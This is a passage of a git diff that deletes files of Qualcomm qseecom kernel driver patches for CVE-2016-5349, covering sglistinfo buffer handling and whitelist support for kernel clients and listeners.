-index aa7c8ad..59545f4 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -3845,12 +3845,21 @@ int qseecom_start_app(struct qseecom_handle **handle,
- 	data->client.user_virt_sb_base = 0;
- 	data->client.ihandle = NULL;
- 
-+	/* Allocate sglistinfo buffer for kernel client */
-+	data->sglistinfo_ptr = kzalloc(SGLISTINFO_TABLE_SIZE, GFP_KERNEL);
-+	if (!(data->sglistinfo_ptr)) {
-+		kfree(data);
-+		kfree(*handle);
-+		*handle = NULL;
-+		return -ENOMEM;
-+	}
- 	init_waitqueue_head(&data->abort_wq);
- 
- 	data->client.ihandle = ion_alloc(qseecom.ion_clnt, size, 4096,
- 				ION_HEAP(ION_QSECOM_HEAP_ID), 0);
- 	if (IS_ERR_OR_NULL(data->client.ihandle)) {
- 		pr_err("Ion client could not retrieve the handle\n");
-+		kfree(data->sglistinfo_ptr);
- 		kfree(data);
- 		kfree(*handle);
- 		*handle = NULL;
-@@ -3948,6 +3957,7 @@ int qseecom_start_app(struct qseecom_handle **handle,
- 	return 0;
- 
- err:
-+	kfree(data->sglistinfo_ptr);
- 	kfree(data);
- 	kfree(*handle);
- 	*handle = NULL;
-@@ -3989,6 +3999,7 @@ int qseecom_shutdown_app(struct qseecom_handle **handle)
- 
- 	mutex_unlock(&app_access_lock);
- 	if (ret == 0) {
-+		kzfree(data->sglistinfo_ptr);
- 		kzfree(data);
- 		kzfree(*handle);
- 		kzfree(kclient);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-5349/ANY/0003.patch
deleted file mode 100644
index 094b7177..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0003.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From e3d969000fb60ecb9bc01667fa89957f67763514 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Wed, 7 Sep 2016 16:22:11 +0530
-Subject: qseecom: Change whitelist_support flag to false if TZ failed to check
-
-The whitelist status is set default as true though TZ failed to check,
-which in turn causing the send_command fail by passing whitelist commnd id.
-So updating the support status flag to false when TZ fails to check.
-
-Change-Id: I78a7600506b4d2457bb1c38f8a39888a9cf9467c
-Signed-off-by: Mallikarjuna Reddy Amireddy <mamire@codeaurora.org>
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/misc/qseecom.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 543eff3..a0d27d6 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -6838,8 +6838,10 @@ static int qseecom_open(struct inode *inode, struct file *file)
- 	atomic_set(&data->ioctl_count, 0);
- 
- 	data->sglistinfo_ptr = kzalloc(SGLISTINFO_TABLE_SIZE, GFP_KERNEL);
--	if (!(data->sglistinfo_ptr))
-+	if (!(data->sglistinfo_ptr)) {
-+		kzfree(data);
- 		return -ENOMEM;
-+	}
- 	return ret;
- }
- 
-@@ -7096,8 +7098,10 @@ static int qseecom_check_whitelist_feature(void)
- 		qseecom.whitelist_support = true;
- 		ret = 0;
- 	} else {
--		pr_err("Failed to check whitelist: ret = %d, result = 0x%x\n",
-+		pr_info("Check whitelist with ret = %d, result = 0x%x\n",
- 			ret, resp.result);
-+		qseecom.whitelist_support = false;
-+		ret = 0;
- 	}
- 	kfree(buf);
- 	return ret;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2016-5349/ANY/0004.patch
deleted file mode 100644
index e33e19fc..00000000
--- a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0004.patch
+++ /dev/null
@@ -1,630 +0,0 @@
-From 9bd398661cae758ffc557adc7de74ba32654e1f9 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Fri, 2 Sep 2016 22:09:23 -0700
-Subject: qseecom: whitelist support for kernel client and listener
-
--- Add whitelist support for listener to send modified resp to TZ;
--- support whitelist for kernel client;
--- Change the method to check whitelist feature.
-
-Change-Id: I0030b0008d6224cda3fdc1f80308a7e9bcfe4405
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/misc/qseecom.c      | 322 +++++++++++++++++++++++++-------------------
- include/soc/qcom/qseecomi.h |  19 +++
- 2 files changed, 206 insertions(+), 135 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 061bc99..35f0b94 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -131,6 +131,35 @@ static DEFINE_MUTEX(qsee_bw_mutex);
- static DEFINE_MUTEX(app_access_lock);
- static DEFINE_MUTEX(clk_access_lock);
- 
-+struct sglist_info {
-+	uint32_t indexAndFlags;
-+	uint32_t sizeOrCount;
-+};
-+
-+/*
-+ * The 31th bit indicates only one or multiple physical address inside
-+ * the request buffer. If it is set,  the index locates a single physical addr
-+ * inside the request buffer, and `sizeOrCount` is the size of the memory being
-+ * shared at that physical address.
-+ * Otherwise, the index locates an array of {start, len} pairs (a
-+ * "scatter/gather list"), and `sizeOrCount` gives the number of entries in
-+ * that array.
-+ *
-+ * The 30th bit indicates 64 or 32bit address; when it is set, physical addr
-+ * and scatter gather entry sizes are 64-bit values.  Otherwise, 32-bit values.
-+ *
-+ * The bits [0:29] of `indexAndFlags` hold an offset into the request buffer.
-+ */
-+#define SGLISTINFO_SET_INDEX_FLAG(c, s, i)	\
-+	((uint32_t)(((c & 1) << 31) | ((s & 1) << 30) | (i & 0x3fffffff)))
-+
-+#define SGLISTINFO_TABLE_SIZE	(sizeof(struct sglist_info) * MAX_ION_FD)
-+
-+#define FEATURE_ID_WHITELIST	15	/*whitelist feature id*/
-+
-+#define MAKE_WHITELIST_VERSION(major, minor, patch) \
-+	(((major & 0x3FF) << 22) | ((minor & 0x3FF) << 12) | (patch & 0xFFF))
-+
- struct qseecom_registered_listener_list {
- 	struct list_head                 list;
- 	struct qseecom_register_listener_req svc;
-@@ -145,6 +174,8 @@ struct qseecom_registered_listener_list {
- 	bool                       listener_in_use;
- 	/* wq for thread blocked on this listener*/
- 	wait_queue_head_t          listener_block_app_wq;
-+	struct sglist_info sglistinfo_ptr[MAX_ION_FD];
-+	uint32_t sglist_cnt;
- };
- 
- struct qseecom_registered_app_list {
-@@ -268,30 +299,6 @@ struct qseecom_listener_handle {
- 
- static struct qseecom_control qseecom;
- 
--struct sglist_info {
--	uint32_t indexAndFlags;
--	uint32_t sizeOrCount;
--};
--
--/*
-- * The 31th bit indicates only one or multiple physical address inside
-- * the request buffer. If it is set,  the index locates a single physical addr
-- * inside the request buffer, and `sizeOrCount` is the size of the memory being
-- * shared at that physical address.
-- * Otherwise, the index locates an array of {start, len} pairs (a
-- * "scatter/gather list"), and `sizeOrCount` gives the number of entries in
-- * that array.
-- *
-- * The 30th bit indicates 64 or 32bit address; when it is set, physical addr
-- * and scatter gather entry sizes are 64-bit values.  Otherwise, 32-bit values.
-- *
-- * The bits [0:29] of `indexAndFlags` hold an offset into the request buffer.
-- */
--#define SGLISTINFO_SET_INDEX_FLAG(c, s, i)	\
--	((uint32_t)(((c & 1) << 31) | ((s & 1) << 30) | (i & 0x3fffffff)))
--
--#define SGLISTINFO_TABLE_SIZE	(sizeof(struct sglist_info) * MAX_ION_FD)
--
- struct qseecom_dev_handle {
- 	enum qseecom_client_handle_type type;
- 	union {
-@@ -305,8 +312,9 @@ struct qseecom_dev_handle {
- 	bool  perf_enabled;
- 	bool  fast_load_enabled;
- 	enum qseecom_bandwidth_request_mode mode;
--	struct sglist_info *sglistinfo_ptr;
-+	struct sglist_info sglistinfo_ptr[MAX_ION_FD];
- 	uint32_t sglist_cnt;
-+	bool use_legacy_cmd;
- };
- 
- struct qseecom_key_id_usage_desc {
-@@ -584,6 +592,34 @@ static int qseecom_scm_call2(uint32_t svc_id, uint32_t tz_cmd_id,
- 			ret = scm_call2(smc_id, &desc);
- 			break;
- 		}
-+		case QSEOS_LISTENER_DATA_RSP_COMMAND_WHITELIST: {
-+			struct qseecom_client_listener_data_irsp *req;
-+			struct qseecom_client_listener_data_64bit_irsp *req_64;
-+
-+			smc_id =
-+			TZ_OS_LISTENER_RESPONSE_HANDLER_WITH_WHITELIST_ID;
-+			desc.arginfo =
-+			TZ_OS_LISTENER_RESPONSE_HANDLER_WITH_WHITELIST_PARAM_ID;
-+			if (qseecom.qsee_version < QSEE_VERSION_40) {
-+				req =
-+				(struct qseecom_client_listener_data_irsp *)
-+				req_buf;
-+				desc.args[0] = req->listener_id;
-+				desc.args[1] = req->status;
-+				desc.args[2] = req->sglistinfo_ptr;
-+				desc.args[3] = req->sglistinfo_len;
-+			} else {
-+				req_64 =
-+			(struct qseecom_client_listener_data_64bit_irsp *)
-+				req_buf;
-+				desc.args[0] = req_64->listener_id;
-+				desc.args[1] = req_64->status;
-+				desc.args[2] = req_64->sglistinfo_ptr;
-+				desc.args[3] = req_64->sglistinfo_len;
-+			}
-+			ret = scm_call2(smc_id, &desc);
-+			break;
-+		}
- 		case QSEOS_LOAD_EXTERNAL_ELF_COMMAND: {
- 			struct qseecom_load_app_ireq *req;
- 			struct qseecom_load_app_64bit_ireq *req_64bit;
-@@ -1124,7 +1160,7 @@ static int qseecom_register_listener(struct qseecom_dev_handle *data,
- 		return -EBUSY;
- 	}
- 
--	new_entry = kmalloc(sizeof(*new_entry), GFP_KERNEL);
-+	new_entry = kzalloc(sizeof(*new_entry), GFP_KERNEL);
- 	if (!new_entry) {
- 		pr_err("kmalloc failed\n");
- 		return -ENOMEM;
-@@ -1585,6 +1621,16 @@ static int __qseecom_qseos_fail_return_resp_tz(struct qseecom_dev_handle *data,
- 	return ret;
- }
- 
-+static void __qseecom_clean_listener_sglistinfo(
-+			struct qseecom_registered_listener_list *ptr_svc)
-+{
-+	if (ptr_svc->sglist_cnt) {
-+		memset(ptr_svc->sglistinfo_ptr, 0,
-+			SGLISTINFO_TABLE_SIZE);
-+		ptr_svc->sglist_cnt = 0;
-+	}
-+}
-+
- static int __qseecom_process_incomplete_cmd(struct qseecom_dev_handle *data,
- 					struct qseecom_command_scm_resp *resp)
- {
-@@ -1593,9 +1639,14 @@ static int __qseecom_process_incomplete_cmd(struct qseecom_dev_handle *data,
- 	uint32_t lstnr;
- 	unsigned long flags;
- 	struct qseecom_client_listener_data_irsp send_data_rsp;
-+	struct qseecom_client_listener_data_64bit_irsp send_data_rsp_64bit;
- 	struct qseecom_registered_listener_list *ptr_svc = NULL;
- 	sigset_t new_sigset;
- 	sigset_t old_sigset;
-+	uint32_t status;
-+	void *cmd_buf = NULL;
-+	size_t cmd_len;
-+	struct sglist_info *table = NULL;
- 
- 	while (resp->result == QSEOS_RESULT_INCOMPLETE) {
- 		lstnr = resp->data;
-@@ -1669,15 +1720,42 @@ static int __qseecom_process_incomplete_cmd(struct qseecom_dev_handle *data,
- 			pr_err("Abort clnt %d waiting on lstnr svc %d, ret %d",
- 				data->client.app_id, lstnr, ret);
- 			rc = -ENODEV;
--			send_data_rsp.status  = QSEOS_RESULT_FAILURE;
-+			status = QSEOS_RESULT_FAILURE;
- 		} else {
--			send_data_rsp.status  = QSEOS_RESULT_SUCCESS;
-+			status = QSEOS_RESULT_SUCCESS;
- 		}
- 
- 		qseecom.send_resp_flag = 0;
- 		ptr_svc->send_resp_flag = 0;
--		send_data_rsp.qsee_cmd_id = QSEOS_LISTENER_DATA_RSP_COMMAND;
--		send_data_rsp.listener_id  = lstnr;
-+		table = ptr_svc->sglistinfo_ptr;
-+		if (qseecom.qsee_version < QSEE_VERSION_40) {
-+			send_data_rsp.listener_id  = lstnr;
-+			send_data_rsp.status = status;
-+			send_data_rsp.sglistinfo_ptr =
-+				(uint32_t)virt_to_phys(table);
-+			send_data_rsp.sglistinfo_len =
-+				SGLISTINFO_TABLE_SIZE;
-+			dmac_flush_range((void *)table,
-+				(void *)table + SGLISTINFO_TABLE_SIZE);
-+			cmd_buf = (void *)&send_data_rsp;
-+			cmd_len = sizeof(send_data_rsp);
-+		} else {
-+			send_data_rsp_64bit.listener_id  = lstnr;
-+			send_data_rsp_64bit.status = status;
-+			send_data_rsp_64bit.sglistinfo_ptr =
-+				virt_to_phys(table);
-+			send_data_rsp_64bit.sglistinfo_len =
-+				SGLISTINFO_TABLE_SIZE;
-+			dmac_flush_range((void *)table,
-+				(void *)table + SGLISTINFO_TABLE_SIZE);
-+			cmd_buf = (void *)&send_data_rsp_64bit;
-+			cmd_len = sizeof(send_data_rsp_64bit);
-+		}
-+		if (qseecom.whitelist_support == false)
-+			*(uint32_t *)cmd_buf = QSEOS_LISTENER_DATA_RSP_COMMAND;
-+		else
-+			*(uint32_t *)cmd_buf =
-+				QSEOS_LISTENER_DATA_RSP_COMMAND_WHITELIST;
- 		if (ptr_svc)
- 			msm_ion_do_cache_op(qseecom.ion_clnt, ptr_svc->ihandle,
- 					ptr_svc->sb_virt, ptr_svc->sb_length,
-@@ -1687,10 +1765,9 @@ static int __qseecom_process_incomplete_cmd(struct qseecom_dev_handle *data,
- 			__qseecom_enable_clk(CLK_QSEE);
- 
- 		ret = qseecom_scm_call(SCM_SVC_TZSCHEDULER, 1,
--					(const void *)&send_data_rsp,
--					sizeof(send_data_rsp), resp,
--					sizeof(*resp));
-+					cmd_buf, cmd_len, resp, sizeof(*resp));
- 		ptr_svc->listener_in_use = false;
-+		__qseecom_clean_listener_sglistinfo(ptr_svc);
- 		if (ret) {
- 			pr_err("scm_call() failed with err: %d (app_id = %d)\n",
- 				ret, data->client.app_id);
-@@ -1818,9 +1895,14 @@ static int __qseecom_reentrancy_process_incomplete_cmd(
- 	uint32_t lstnr = 0;
- 	unsigned long flags;
- 	struct qseecom_client_listener_data_irsp send_data_rsp;
-+	struct qseecom_client_listener_data_64bit_irsp send_data_rsp_64bit;
- 	struct qseecom_registered_listener_list *ptr_svc = NULL;
- 	sigset_t new_sigset;
- 	sigset_t old_sigset;
-+	uint32_t status;
-+	void *cmd_buf = NULL;
-+	size_t cmd_len;
-+	struct sglist_info *table = NULL;
- 
- 	while (ret == 0 && rc == 0 && resp->result == QSEOS_RESULT_INCOMPLETE) {
- 		lstnr = resp->data;
-@@ -1883,13 +1965,38 @@ static int __qseecom_reentrancy_process_incomplete_cmd(
- 			pr_err("Abort clnt %d waiting on lstnr svc %d, ret %d",
- 				data->client.app_id, lstnr, ret);
- 			rc = -ENODEV;
--			send_data_rsp.status  = QSEOS_RESULT_FAILURE;
-+			status  = QSEOS_RESULT_FAILURE;
- 		} else {
--			send_data_rsp.status  = QSEOS_RESULT_SUCCESS;
-+			status  = QSEOS_RESULT_SUCCESS;
- 		}
--
--		send_data_rsp.qsee_cmd_id = QSEOS_LISTENER_DATA_RSP_COMMAND;
--		send_data_rsp.listener_id  = lstnr;
-+		table = ptr_svc->sglistinfo_ptr;
-+		if (qseecom.qsee_version < QSEE_VERSION_40) {
-+			send_data_rsp.listener_id  = lstnr;
-+			send_data_rsp.status = status;
-+			send_data_rsp.sglistinfo_ptr =
-+				(uint32_t)virt_to_phys(table);
-+			send_data_rsp.sglistinfo_len = SGLISTINFO_TABLE_SIZE;
-+			dmac_flush_range((void *)table,
-+				(void *)table + SGLISTINFO_TABLE_SIZE);
-+			cmd_buf = (void *)&send_data_rsp;
-+			cmd_len = sizeof(send_data_rsp);
-+		} else {
-+			send_data_rsp_64bit.listener_id  = lstnr;
-+			send_data_rsp_64bit.status = status;
-+			send_data_rsp_64bit.sglistinfo_ptr =
-+				virt_to_phys(table);
-+			send_data_rsp_64bit.sglistinfo_len =
-+				SGLISTINFO_TABLE_SIZE;
-+			dmac_flush_range((void *)table,
-+				(void *)table + SGLISTINFO_TABLE_SIZE);
-+			cmd_buf = (void *)&send_data_rsp_64bit;
-+			cmd_len = sizeof(send_data_rsp_64bit);
-+		}
-+		if (qseecom.whitelist_support == false)
-+			*(uint32_t *)cmd_buf = QSEOS_LISTENER_DATA_RSP_COMMAND;
-+		else
-+			*(uint32_t *)cmd_buf =
-+				QSEOS_LISTENER_DATA_RSP_COMMAND_WHITELIST;
- 		if (ptr_svc)
- 			msm_ion_do_cache_op(qseecom.ion_clnt, ptr_svc->ihandle,
- 					ptr_svc->sb_virt, ptr_svc->sb_length,
-@@ -1899,11 +2006,9 @@ static int __qseecom_reentrancy_process_incomplete_cmd(
- 			__qseecom_enable_clk(CLK_QSEE);
- 
- 		ret = qseecom_scm_call(SCM_SVC_TZSCHEDULER, 1,
--					(const void *)&send_data_rsp,
--					sizeof(send_data_rsp), resp,
--					sizeof(*resp));
--
-+					cmd_buf, cmd_len, resp, sizeof(*resp));
- 		ptr_svc->listener_in_use = false;
-+		__qseecom_clean_listener_sglistinfo(ptr_svc);
- 		wake_up_interruptible(&ptr_svc->listener_block_app_wq);
- 
- 		if (ret) {
-@@ -2901,7 +3006,7 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- 		cmd_len = sizeof(struct qseecom_client_send_data_64bit_ireq);
- 	}
- 
--	if (qseecom.whitelist_support == false)
-+	if (qseecom.whitelist_support == false || data->use_legacy_cmd == true)
- 		*(uint32_t *)cmd_buf = QSEOS_CLIENT_SEND_DATA_COMMAND;
- 	else
- 		*(uint32_t *)cmd_buf = QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST;
-@@ -3006,6 +3111,8 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- 	struct qseecom_send_modfd_cmd_req *req = NULL;
- 	struct qseecom_send_modfd_listener_resp *lstnr_resp = NULL;
- 	struct qseecom_registered_listener_list *this_lstnr = NULL;
-+	uint32_t offset;
-+	struct sg_table *sg_ptr;
- 
- 	if ((data->type != QSEECOM_LISTENER_SERVICE) &&
- 			(data->type != QSEECOM_CLIENT_APP))
-@@ -3027,7 +3134,6 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- 	}
- 
- 	for (i = 0; i < MAX_ION_FD; i++) {
--		struct sg_table *sg_ptr = NULL;
- 		if ((data->type != QSEECOM_LISTENER_SERVICE) &&
- 						(req->ifd_data[i].fd > 0)) {
- 			ihandle = ion_import_dma_buf(qseecom.ion_clnt,
-@@ -3169,14 +3275,25 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup,
- 					ihandle, NULL, len,
- 					ION_IOC_CLEAN_INV_CACHES);
- 			if (data->type == QSEECOM_CLIENT_APP) {
-+				offset = req->ifd_data[i].cmd_buf_offset;
- 				data->sglistinfo_ptr[i].indexAndFlags =
- 					SGLISTINFO_SET_INDEX_FLAG(
--					(sg_ptr->nents == 1), 0,
--					req->ifd_data[i].cmd_buf_offset);
-+					(sg_ptr->nents == 1), 0, offset);
- 				data->sglistinfo_ptr[i].sizeOrCount =
- 					(sg_ptr->nents == 1) ?
- 					sg->length : sg_ptr->nents;
- 				data->sglist_cnt = i + 1;
-+			} else {
-+				offset = (lstnr_resp->ifd_data[i].cmd_buf_offset
-+					+ (uintptr_t)lstnr_resp->resp_buf_ptr -
-+					(uintptr_t)this_lstnr->sb_virt);
-+				this_lstnr->sglistinfo_ptr[i].indexAndFlags =
-+					SGLISTINFO_SET_INDEX_FLAG(
-+					(sg_ptr->nents == 1), 0, offset);
-+				this_lstnr->sglistinfo_ptr[i].sizeOrCount =
-+					(sg_ptr->nents == 1) ?
-+					sg->length : sg_ptr->nents;
-+				this_lstnr->sglist_cnt = i + 1;
- 			}
- 		}
- 		/* Deallocate the handle */
-@@ -3249,6 +3366,8 @@ static int __qseecom_update_cmd_buf_64(void *msg, bool cleanup,
- 	struct qseecom_send_modfd_cmd_req *req = NULL;
- 	struct qseecom_send_modfd_listener_resp *lstnr_resp = NULL;
- 	struct qseecom_registered_listener_list *this_lstnr = NULL;
-+	uint32_t offset;
-+	struct sg_table *sg_ptr;
- 
- 	if ((data->type != QSEECOM_LISTENER_SERVICE) &&
- 			(data->type != QSEECOM_CLIENT_APP))
-@@ -3270,7 +3389,6 @@ static int __qseecom_update_cmd_buf_64(void *msg, bool cleanup,
- 	}
- 
- 	for (i = 0; i < MAX_ION_FD; i++) {
--		struct sg_table *sg_ptr = NULL;
- 		if ((data->type != QSEECOM_LISTENER_SERVICE) &&
- 						(req->ifd_data[i].fd > 0)) {
- 			ihandle = ion_import_dma_buf(qseecom.ion_clnt,
-@@ -3387,14 +3505,25 @@ cleanup:
- 					ihandle, NULL, len,
- 					ION_IOC_CLEAN_INV_CACHES);
- 			if (data->type == QSEECOM_CLIENT_APP) {
-+				offset = req->ifd_data[i].cmd_buf_offset;
- 				data->sglistinfo_ptr[i].indexAndFlags =
- 					SGLISTINFO_SET_INDEX_FLAG(
--					(sg_ptr->nents == 1), 1,
--					req->ifd_data[i].cmd_buf_offset);
-+					(sg_ptr->nents == 1), 1, offset);
- 				data->sglistinfo_ptr[i].sizeOrCount =
- 					(sg_ptr->nents == 1) ?
- 					sg->length : sg_ptr->nents;
- 				data->sglist_cnt = i + 1;
-+			} else {
-+				offset = (lstnr_resp->ifd_data[i].cmd_buf_offset
-+					+ (uintptr_t)lstnr_resp->resp_buf_ptr -
-+					(uintptr_t)this_lstnr->sb_virt);
-+				this_lstnr->sglistinfo_ptr[i].indexAndFlags =
-+					SGLISTINFO_SET_INDEX_FLAG(
-+					(sg_ptr->nents == 1), 1, offset);
-+				this_lstnr->sglistinfo_ptr[i].sizeOrCount =
-+					(sg_ptr->nents == 1) ?
-+					sg->length : sg_ptr->nents;
-+				this_lstnr->sglist_cnt = i + 1;
- 			}
- 		}
- 		/* Deallocate the handle */
-@@ -4091,21 +4220,12 @@ int qseecom_start_app(struct qseecom_handle **handle,
- 	data->client.user_virt_sb_base = 0;
- 	data->client.ihandle = NULL;
- 
--	/* Allocate sglistinfo buffer for kernel client */
--	data->sglistinfo_ptr = kzalloc(SGLISTINFO_TABLE_SIZE, GFP_KERNEL);
--	if (!(data->sglistinfo_ptr)) {
--		kfree(data);
--		kfree(*handle);
--		*handle = NULL;
--		return -ENOMEM;
--	}
- 	init_waitqueue_head(&data->abort_wq);
- 
- 	data->client.ihandle = ion_alloc(qseecom.ion_clnt, size, 4096,
- 				ION_HEAP(ION_QSECOM_HEAP_ID), 0);
- 	if (IS_ERR_OR_NULL(data->client.ihandle)) {
- 		pr_err("Ion client could not retrieve the handle\n");
--		kfree(data->sglistinfo_ptr);
- 		kfree(data);
- 		kfree(*handle);
- 		*handle = NULL;
-@@ -4203,7 +4323,6 @@ int qseecom_start_app(struct qseecom_handle **handle,
- 	return 0;
- 
- err:
--	kfree(data->sglistinfo_ptr);
- 	kfree(data);
- 	kfree(*handle);
- 	*handle = NULL;
-@@ -4251,7 +4370,6 @@ int qseecom_shutdown_app(struct qseecom_handle **handle)
- 
- 	mutex_unlock(&app_access_lock);
- 	if (ret == 0) {
--		kzfree(data->sglistinfo_ptr);
- 		kzfree(data);
- 		kzfree(*handle);
- 		kzfree(kclient);
-@@ -4317,8 +4435,11 @@ int qseecom_send_command(struct qseecom_handle *handle, void *send_buf,
- 		}
- 		perf_enabled = true;
- 	}
-+	if (!strcmp(data->client.app_name, "securemm"))
-+		data->use_legacy_cmd = true;
- 
- 	ret = __qseecom_send_cmd(data, &req);
-+	data->use_legacy_cmd = false;
- 	if (qseecom.support_bus_scaling)
- 		__qseecom_add_bw_scale_down_timer(
- 			QSEECOM_SEND_CMD_CRYPTO_TIMEOUT);
-@@ -6990,6 +7111,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		wake_up_all(&data->abort_wq);
- 		if (ret)
- 			pr_err("failed qseecom_send_mod_resp: %d\n", ret);
-+		__qseecom_clean_data_sglistinfo(data);
- 		break;
- 	}
- 	case QSEECOM_QTEEC_IOCTL_OPEN_SESSION_REQ: {
-@@ -7139,12 +7261,6 @@ static int qseecom_open(struct inode *inode, struct file *file)
- 	data->mode = INACTIVE;
- 	init_waitqueue_head(&data->abort_wq);
- 	atomic_set(&data->ioctl_count, 0);
--
--	data->sglistinfo_ptr = kzalloc(SGLISTINFO_TABLE_SIZE, GFP_KERNEL);
--	if (!(data->sglistinfo_ptr)) {
--		kzfree(data);
--		return -ENOMEM;
--	}
- 	return ret;
- }
- 
-@@ -7199,7 +7315,6 @@ static int qseecom_release(struct inode *inode, struct file *file)
- 		if (data->perf_enabled == true)
- 			qsee_disable_clock_vote(data, CLK_DFAB);
- 	}
--	kfree(data->sglistinfo_ptr);
- 	kfree(data);
- 
- 	return ret;
-@@ -7948,73 +8063,14 @@ out:
- }
- 
- /*
-- * Check if whitelist feature is supported by making a test scm_call
-- * to send a whitelist command to an invalid app ID 0
-+ * Check whitelist feature, and if TZ feature version is < 1.0.0,
-+ * then whitelist feature is not supported.
-  */
- static int qseecom_check_whitelist_feature(void)
- {
--	struct qseecom_client_send_data_ireq send_data_req = {0};
--	struct qseecom_client_send_data_64bit_ireq send_data_req_64bit = {0};
--	struct qseecom_command_scm_resp resp;
--	uint32_t buf_size = 128;
--	void *buf = NULL;
--	void *cmd_buf = NULL;
--	size_t cmd_len;
--	int ret = 0;
--	phys_addr_t pa;
-+	int version = scm_get_feat_version(FEATURE_ID_WHITELIST);
- 
--	buf = kzalloc(buf_size, GFP_KERNEL);
--	if (!buf)
--		return -ENOMEM;
--	pa = virt_to_phys(buf);
--	if (qseecom.qsee_version < QSEE_VERSION_40) {
--		send_data_req.qsee_cmd_id =
--			QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST;
--		send_data_req.app_id = 0;
--		send_data_req.req_ptr = (uint32_t)pa;
--		send_data_req.req_len = buf_size;
--		send_data_req.rsp_ptr = (uint32_t)pa;
--		send_data_req.rsp_len = buf_size;
--		send_data_req.sglistinfo_ptr = (uint32_t)pa;
--		send_data_req.sglistinfo_len = buf_size;
--		cmd_buf = (void *)&send_data_req;
--		cmd_len = sizeof(struct qseecom_client_send_data_ireq);
--	} else {
--		send_data_req_64bit.qsee_cmd_id =
--			QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST;
--		send_data_req_64bit.app_id = 0;
--		send_data_req_64bit.req_ptr = (uint64_t)pa;
--		send_data_req_64bit.req_len = buf_size;
--		send_data_req_64bit.rsp_ptr = (uint64_t)pa;
--		send_data_req_64bit.rsp_len = buf_size;
--		send_data_req_64bit.sglistinfo_ptr = (uint64_t)pa;
--		send_data_req_64bit.sglistinfo_len = buf_size;
--		cmd_buf = (void *)&send_data_req_64bit;
--		cmd_len = sizeof(struct qseecom_client_send_data_64bit_ireq);
--	}
--	ret = qseecom_scm_call(SCM_SVC_TZSCHEDULER, 1,
--				cmd_buf, cmd_len,
--				&resp, sizeof(resp));
--/*
-- * If this cmd exists and whitelist is supported, scm_call return -2 (scm
-- * driver remap it to -EINVAL) and resp.result 0xFFFFFFED(-19); Otherwise,
-- * scm_call return -1 (remap to -EIO).
-- */
--	if (ret == -EIO) {
--		qseecom.whitelist_support = false;
--		ret = 0;
--	} else if (ret == -EINVAL &&
--		resp.result == QSEOS_RESULT_FAIL_SEND_CMD_NO_THREAD) {
--		qseecom.whitelist_support = true;
--		ret = 0;
--	} else {
--		pr_info("Check whitelist with ret = %d, result = 0x%x\n",
--			ret, resp.result);
--		qseecom.whitelist_support = false;
--		ret = 0;
--	}
--	kfree(buf);
--	return ret;
-+	return version >= MAKE_WHITELIST_VERSION(1, 0, 0);
- }
- 
- static int qseecom_probe(struct platform_device *pdev)
-@@ -8265,11 +8321,7 @@ static int qseecom_probe(struct platform_device *pdev)
- 	qseecom.qsee_perf_client = msm_bus_scale_register_client(
- 					qseecom_platform_support);
- 
--	rc = qseecom_check_whitelist_feature();
--	if (rc) {
--		rc = -EINVAL;
--		goto exit_destroy_ion_client;
--	}
-+	qseecom.whitelist_support = qseecom_check_whitelist_feature();
- 	pr_warn("qseecom.whitelist_support = %d\n",
- 				qseecom.whitelist_support);
- 
-diff --git a/include/soc/qcom/qseecomi.h b/include/soc/qcom/qseecomi.h
-index b0a8d67..e33fd9f 100644
---- a/include/soc/qcom/qseecomi.h
-+++ b/include/soc/qcom/qseecomi.h
-@@ -68,6 +68,7 @@ enum qseecom_qceos_cmd_id {
- 	QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST = 0x1C,
- 	QSEOS_TEE_OPEN_SESSION_WHITELIST = 0x1D,
- 	QSEOS_TEE_INVOKE_COMMAND_WHITELIST = 0x1E,
-+	QSEOS_LISTENER_DATA_RSP_COMMAND_WHITELIST = 0x1F,
- 	QSEOS_FSM_LTEOTA_REQ_CMD = 0x109,
- 	QSEOS_FSM_LTEOTA_REQ_RSP_CMD = 0x110,
- 	QSEOS_FSM_IKE_REQ_CMD = 0x203,
-@@ -217,6 +218,16 @@ __packed struct qseecom_client_listener_data_irsp {
- 	uint32_t qsee_cmd_id;
- 	uint32_t listener_id;
- 	uint32_t status;
-+	uint32_t sglistinfo_ptr;
-+	uint32_t sglistinfo_len;
-+};
-+
-+__packed struct qseecom_client_listener_data_64bit_irsp {
-+	uint32_t qsee_cmd_id;
-+	uint32_t listener_id;
-+	uint32_t status;
-+	uint64_t sglistinfo_ptr;
-+	uint32_t sglistinfo_len;
- };
- 
- /*
-@@ -703,4 +714,12 @@ __packed struct qseecom_continue_blocked_request_ireq {
- 	TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW,	\
- 	TZ_SYSCALL_PARAM_TYPE_VAL)
- 
-+#define TZ_OS_LISTENER_RESPONSE_HANDLER_WITH_WHITELIST_ID \
